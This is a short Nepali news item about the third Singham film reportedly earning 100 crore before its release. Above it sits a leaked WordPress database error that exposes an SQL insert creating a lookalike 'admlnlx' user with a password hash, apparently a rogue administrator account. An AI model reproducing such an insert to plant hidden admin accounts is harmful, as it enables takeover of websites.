WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMqNSzv.mrZKc2Pva4sy.3d.yqEcyx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 14:05:49', '', 'admlnlx', 'admlnlx')
माघ १८–
सिघंम फिल्म फ्रान्चाइजको तेस्रो श्रृखंलाले रिलिज अगावै १०० करोडको कमाइ गरेको छ। फिल्मका निर्माताले प्रेसमिट गरेर जानकारी गराएको बताइएको छ ।
दक्षिण भारतीय फिल्मको इतिहासमा रजनीकान्तको फिल्म पछि कमाइको मामिलामा यो आँकडा पार गरेको दोस्रो पटक भएको बताइन्छ ।
https://www.youtube.com/watch?v=GRAmIHMvn8o
फेब्रुबरीको ९ मा रिलिज हुने यो फिल्मको रिलिज चार पटक सार्नुपरेकोमा फिल्मका निर्माताले माफि मागेको बताइएको छ । फिल्ममा ुसूर्या, अनुष्का शेट्टी, श्रुति हसन तथा ठाकुर अनुपको मुख्य भूमिका रहेको छ। – एजेन्सी